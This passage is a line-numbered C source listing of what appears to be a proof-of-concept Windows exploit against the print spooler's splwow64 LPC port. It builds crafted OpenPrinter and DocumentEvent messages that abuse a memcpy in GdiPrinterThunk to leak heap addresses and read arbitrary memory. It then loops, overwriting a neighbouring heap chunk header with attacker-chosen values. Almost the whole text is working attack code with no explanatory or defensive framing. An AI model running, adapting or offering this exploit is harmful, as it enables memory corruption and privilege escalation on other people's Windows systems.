| printf("failed on NtCreateSection\n"); 178 | return 0; 179 | } 180 | if (sectionHandle) 181 | { 182 | ClientView->SectionHandle = sectionHandle; 183 | ClientView->Length = 0x30; 184 | ClientView->ViewSize = 0x9000; 185 | int retval = ZwSecureConnectPort(&portHandle, PortName, NULL, ClientView, NULL, NULL, NULL, NULL, NULL); 186 | if (retval) { 187 | printf("Failed on ZwSecureConnectPort: 0x%x\n", retval); 188 | return 0; 189 | } 190 | } 191 | 192 | return portHandle; 193 | } 194 | 195 | PVOID Prepare0x6AMessage(PMView mview) 196 | { 197 | const wchar_t* printerName = L"Microsoft XPS Document Writer"; 198 | memset(&mview->LpcRequest, 0, sizeof(mview->LpcRequest)); 199 | mview->LpcRequest.MessageHeader.DataSize = 0x20; 200 | mview->LpcRequest.MessageHeader.MessageSize = 0x48; 201 | 202 | mview->LpcRequest.MsgSendLen = 0x300; 203 | mview->LpcRequest.PtrMsgSend = (UINT64)mview->ClientView.ViewRemoteBase; 204 | mview->LpcRequest.MsgReplyLen = 0x10; 205 | mview->LpcRequest.PtrMsgReply = (UINT64)mview->ClientView.ViewRemoteBase + 0x140; 206 | //printf("PtrMsgReply: 0x%p\n", LpcRequest.PtrMsgReply); 207 | memcpy(&mview->LpcReply, &mview->LpcRequest, sizeof(mview->LpcRequest)); 208 | memcpy(&mview->LpcReply, &mview->LpcRequest, sizeof(mview->LpcRequest)); 209 | 210 | *(UINT64*)mview->ClientView.ViewBase = 0x6A00000000; //Msg Type (OpenPrinter) 211 | *((UINT64*)mview->ClientView.ViewBase + 0x3) = 0x100; // Offset to pointer to Printer Name 212 | *((UINT64*)mview->ClientView.ViewBase + 0x4) = 0x00; //Printer defaults to OpenPrinter 213 | *((UINT64*)mview->ClientView.ViewBase + 0x8) = 0x00; 214 | *((UINT64*)mview->ClientView.ViewBase + 0x7) = 0x500000005; // Args 2 & 3 to bAddPrinterHandle 215 | 216 | memcpy(mview->ClientView.ViewBase + 0x100, printerName, 0x3C); 217 | *((UINT64*)mview->ClientView.ViewBase + 0x10) = 0x41414141; 218 | return mview->ClientView.ViewBase; 219 | } 220 | 221 | // only does 8 byte reads atm; update 0xA2/0xA3 to increase 222 | PVOID PrepareForRead(PMView mview, UINT64 heapAddress, UINT64 readAddress) 223 | { 224 | memset(&mview->LpcRequest, 0, sizeof(mview->LpcRequest)); 225 | mview->LpcRequest.MessageHeader.DataSize = 0x20; 226 | mview->LpcRequest.MessageHeader.MessageSize = 0x48; 227 | 228 | mview->LpcRequest.MsgSendLen = mview->MsgSize; 229 | mview->LpcRequest.PtrMsgSend = (UINT64)mview->ClientView.ViewRemoteBase; 230 | mview->LpcRequest.MsgReplyLen = 0x10; 231 | mview->LpcRequest.PtrMsgReply = (UINT64)mview->ClientView.ViewRemoteBase + 0x88; 232 | 233 | memcpy(&mview->LpcReply, &mview->LpcRequest, sizeof(mview->LpcRequest)); 234 | memset(mview->ClientView.ViewBase, 0, mview->MsgSize); 235 | 236 | *(UINT64*)mview->ClientView.ViewBase = 0x6D00000000; //Msg Type (Document Event) 237 | *((UINT64*)mview->ClientView.ViewBase + 3) = mview->Cookie; 238 | *((UINT64*)mview->ClientView.ViewBase + 4) = 0x500000005; // 2nd arg to FindPrinterHandle 239 | 240 | // 0x0003 is for the second switch inside gdi32full!GdiPrinterTHunk 241 | *((UINT64*)mview->ClientView.ViewBase + 7) = 0x2000000003; //iEsc argument to DocumentEvent & cbIn 242 | //0x40 243 | *((UINT64*)mview->ClientView.ViewBase + 8) = 0x100;//OFFSET- pvIn 244 | *((UINT64*)mview->ClientView.ViewBase + 9) = 0x200; //cbOut 245 | //0x200 246 | *((UINT64*)mview->ClientView.ViewBase + 0x40) = 0x6767; 247 | //0x100 248 | *((UINT64*)mview->ClientView.ViewBase + 0x20) = 0x40;// 0x40; // +B points here 249 | //0x110 250 | *((UINT64*)mview->ClientView.ViewBase + 0x22) = NULL; 251 | //0x150 252 | *((UINT64*)mview->ClientView.ViewBase + 0x2A) = (UINT64)mview->ClientView.ViewRemoteBase + 0x200; 253 | //0x250 254 | *((UINT64*)mview->ClientView.ViewBase + 0x4A) = (UINT64)0; //Where the contents of memcpy are written to 255 | 256 | *((UINT64*)mview->ClientView.ViewBase + 0x40) = 0x4242424242424242; 257 | *((UINT64*)mview->ClientView.ViewBase + 0xA) = 0x60; // offset to address of source pointer 258 | *((WORD*)mview->ClientView.ViewBase + 0xA2) = (WORD)0x04; 259 | *((WORD*)mview->ClientView.ViewBase + 0xA3) = (WORD)0x04; 260 | *((UINT64*)mview->ClientView.ViewBase + 0xB) = 0x250; //Destination of memcpy 261 | *((UINT64*)mview->ClientView.ViewBase + 0x4A) = (UINT64)0; //Where the contents of memcpy are written to 262 | 263 | // 0x60; read address 264 | *((UINT64*)mview->ClientView.ViewBase + 0xC) = readAddress; 265 | 266 | return mview->ClientView.ViewBase; 267 | } 268 | 269 | PVOID Prepare0x6DMessage(PMView mview, UINT64 heapAddress) 270 | { 271 | return Prepare0x6DMessage(mview, heapAddress, 0x41414141, 0x4242424242424242); 272 | } 273 | 274 | PVOID Prepare0x6DMessage(PMView mview, UINT64 heapAddress, UINT64 overwriteDest, UINT64 overwriteValue) 275 | { 276 | memset(&mview->LpcRequest, 0, sizeof(mview->LpcRequest)); 277 | mview->LpcRequest.MessageHeader.DataSize = 0x20; 278 | mview->LpcRequest.MessageHeader.MessageSize = 0x48; 279 | 280 | mview->LpcRequest.MsgSendLen = mview->MsgSize; 281 | mview->LpcRequest.PtrMsgSend = (UINT64)mview->ClientView.ViewRemoteBase; 282 | mview->LpcRequest.MsgReplyLen = 0x10; 283 | mview->LpcRequest.PtrMsgReply = (UINT64)mview->ClientView.ViewRemoteBase + 0x88; 284 | 285 | memcpy(&mview->LpcReply, &mview->LpcRequest, sizeof(mview->LpcRequest)); 286 | memset(mview->ClientView.ViewBase, 0, mview->MsgSize); 287 | 288 | *(UINT64*)mview->ClientView.ViewBase = 0x6D00000000; //Msg Type (Document Event) 289 | *((UINT64*)mview->ClientView.ViewBase + 3) = mview->Cookie; 290 | *((UINT64*)mview->ClientView.ViewBase + 4) = 0x500000005; // 2nd arg to FindPrinterHandle 291 | 292 | // 0x0003 is for the second switch inside gdi32full!GdiPrinterTHunk 293 | *((UINT64*)mview->ClientView.ViewBase + 7) = 0x2000000003; //iEsc argument to DocumentEvent & cbIn 294 | //0x40 295 | *((UINT64*)mview->ClientView.ViewBase + 8) = 0x100;//OFFSET- pvIn 296 | *((UINT64*)mview->ClientView.ViewBase + 9) = 0x200; //cbOut 297 | //0x200 298 | *((UINT64*)mview->ClientView.ViewBase + 0x40) = 0x6767; 299 | //0x100 300 | *((UINT64*)mview->ClientView.ViewBase + 0x20) = 0x40; // +B points here 301 | //0x110 302 | *((UINT64*)mview->ClientView.ViewBase + 0x22) = NULL; 303 | //0x150 304 | *((UINT64*)mview->ClientView.ViewBase + 0x2A) = (UINT64)mview->ClientView.ViewRemoteBase + 0x200; 305 | //0x250 306 | *((UINT64*)mview->ClientView.ViewBase + 0x4A) = (UINT64)0; //Where the contents of memcpy are written to 307 | 308 | if (!heapAddress) { 309 | *((UINT64*)mview->ClientView.ViewBase + 0xA) = 0x150; //Buffer out to DocumentEvent, pointer to pointer of src of memcpy 310 | *((UINT64*)mview->ClientView.ViewBase + 0x40) = overwriteValue; 311 | *((UINT64*)mview->ClientView.ViewBase + 0xA) = 0x40; //Buffer out to DocumentEvent, pointer to pointer of src of memcpy 312 | *((WORD*)mview->ClientView.ViewBase + 0xA2) = (WORD)0x04; 313 | *((WORD*)mview->ClientView.ViewBase + 0xA3) = (WORD)0x04; 314 | *((UINT64*)mview->ClientView.ViewBase + 0xB) = 0x250; //Destination of memcpy 315 | *((UINT64*)mview->ClientView.ViewBase + 0x4A) = (UINT64)0; //Where the contents of memcpy are written to 316 | } 317 | else { 318 | *((UINT64*)mview->ClientView.ViewBase + 0xA) = 0x150; //Buffer out to DocumentEvent, pointer to pointer of src of memcpy 319 | *((UINT64*)mview->ClientView.ViewBase + 0x40) = overwriteValue; //Source contents to write 320 | *((UINT64*)mview->ClientView.ViewBase + 0xB) = overwriteDest - heapAddress; //Destination of memcpy 321 | *((WORD*)mview->ClientView.ViewBase + 0x122) = (WORD)0x04; // offset +0x122 and +0x123 are added together to create the size of memcpy 322 | *((WORD*)mview->ClientView.ViewBase + 0x123) = (WORD)0x04; 323 | } 324 | 325 | return mview->ClientView.ViewBase; 326 | } 327 | 328 | UINT64 LeakAddress(PMView mview, UINT64 HeapAddress, UINT64 targetAddress) 329 | { 330 | if (!(mview->ClientView.ViewBase && mview->ClientView.ViewRemoteBase)) 331 | return 0; 332 | 333 | if (mview->Cookie == 0) 334 | { 335 | Prepare0x6AMessage(mview); 336 | if (NtRequestWaitReplyPort(mview->hPortHandle, &mview->LpcRequest, &mview->LpcReply) != 0) { 337 | printf("Writing message 0x6A failed\n"); 338 | exit(1); 339 | } 340 | 341 | mview->Cookie = *((UINT64*)mview->ClientView.ViewBase + 0x28); 342 | } 343 | 344 | PrepareForRead(mview, HeapAddress, targetAddress); 345 | if (NtRequestWaitReplyPort(mview->hPortHandle, &mview->LpcRequest, &mview->LpcReply) != 0) { 346 | printf("Writing message 0x6A failed\n"); 347 | exit(1); 348 | } 349 | 350 | return *((UINT64*)mview->ClientView.ViewBase + 0x4A) - 0x40; 351 | } 352 | 353 | UINT64 LeakHeapAddress(PMView mview) 354 | { 355 | if (!(mview->ClientView.ViewBase && mview->ClientView.ViewRemoteBase)) 356 | return 0; 357 | 358 | if (mview->Cookie == 0) 359 | { 360 | Prepare0x6AMessage(mview); 361 | if (NtRequestWaitReplyPort(mview->hPortHandle, &mview->LpcRequest, &mview->LpcReply) != 0) { 362 | printf("Writing message 0x6A failed\n"); 363 | exit(1); 364 | } 365 | 366 | mview->Cookie = *((UINT64*)mview->ClientView.ViewBase + 0x28); 367 | } 368 | 369 | Prepare0x6DMessage(mview, 0); 370 | if (NtRequestWaitReplyPort(mview->hPortHandle, &mview->LpcRequest, &mview->LpcReply) != 0) { 371 | printf("Writing message 0x6D (first time) failed\n"); 372 | exit(1); 373 | } 374 | 375 | return *((UINT64*)mview->ClientView.ViewBase + 0x4A) - 0x40; 376 | } 377 | 378 | void Loop6D(PMView mview) 379 | { 380 | while (true) 381 | LeakHeapAddress(mview); 382 | } 383 | 384 | int main() 385 | { 386 | Init(); 387 | 388 | CHAR Path[0x100]; 389 | 390 | GetCurrentDirectoryA(sizeof(Path), Path); 391 | printf("%s\n", Path); 392 | PathAppendA(Path, "CreateDC.exe"); 393 | printf("%s\n", Path); 394 | 395 | if (!(PathFileExistsA(Path))) 396 | { 397 | printf("CreateDC.exe does not exist\n"); 398 | return 0; 399 | } 400 | WinExec(Path, 0); 401 | 402 | CreateDCW(L"Microsoft XPS Document Writer", L"Microsoft XPS Document Writer", NULL, NULL); 403 | 404 | printf("Debugger..\n"); 405 | fflush(stdout); 406 | getchar(); 407 | 408 | UNICODE_STRING portName; 409 | if (!GetPortName(&portName)) 410 | { 411 | printf("Failed to get port name\n"); 412 | return 0; 413 | } 414 | 415 | MView PortViewA = { 0 }, PortViewB = { 0 }; 416 | 417 | PortViewA.hPortHandle = CreatePortSharedBuffer(&PortViewA.ClientView, &portName); 418 | GetPortName(&portName); 419 | PortViewB.hPortHandle = CreatePortSharedBuffer(&PortViewB.ClientView, &portName); 420 | 421 | if (!(PortViewA.hPortHandle && PortViewB.hPortHandle)) 422 | { 423 | printf("PortViewA = 0x%llX && PortViewB = 0x%llX\n", PortViewA.hPortHandle, PortViewB.hPortHandle); 424 | return 0; 425 | } 426 | 427 | PortViewA.MsgSize = 0x300; 428 | PortViewB.MsgSize = 0x2000-8; 429 | 430 | /* trigger LFH 431 | UINT64 pv = 0; 432 | for (int i = 0; i < 2500; ++i) { 433 | pv = LeakHeapAddress(&PortViewA); 434 | LeakHeapAddress(&PortViewB); 435 | } 436 | */ 437 | 438 | UINT64 PortViewAHeap = LeakHeapAddress(&PortViewA); 439 | UINT64 PortViewBHeap = LeakHeapAddress(&PortViewB); 440 | printf("PVA @ 0x%p\nPVB @ 0x%p\n", PortViewAHeap, PortViewBHeap); 441 | 442 | if (PortViewAHeap == PortViewBHeap) 443 | { 444 | printf("Something went terribly wrong, check sizes?\n"); 445 | return 1; 446 | } 447 | 448 | // leak chunk header 449 | UINT64 Header = LeakAddress(&PortViewA, PortViewAHeap, PortViewBHeap - 8); 450 | printf("Chunk header %llx\n", Header); 451 | 452 | // start PortViewA thread that just runs 0x6d's 453 | HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop6D, &PortViewB, 0, NULL); 454 | 455 | // spin trying to smash PortViewA's header 456 | while (true) 457 | { 458 | Prepare0x6DMessage(&PortViewA, PortViewAHeap, PortViewBHeap-8, 0x4141414141414141); 459 | if (NtRequestWaitReplyPort(PortViewA.hPortHandle, &PortViewA.LpcRequest, &PortViewA.LpcReply) != 0) { 460 | exit(1); 461 | } 462 | } 463 | 464 | return 0; 465 | } --------------------------------------------------------------------------------